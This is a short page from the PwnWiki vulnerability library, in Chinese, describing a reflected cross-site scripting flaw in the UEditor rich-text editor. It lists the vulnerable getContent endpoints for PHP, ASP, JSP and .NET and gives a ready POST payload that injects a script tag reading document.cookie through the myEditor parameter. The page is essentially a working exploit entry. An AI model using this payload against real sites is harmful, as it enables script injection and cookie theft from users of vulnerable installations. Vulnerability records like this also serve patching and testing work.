Loading
0

Ueditor 反射型XSS漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

漏洞位置

/php/getContent.php /asp/getContent.asp /jsp/getContent.jsp /net/getContent.ashx

XSS

POST:

myEditor=<script>alert(document.cookie)</script>

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库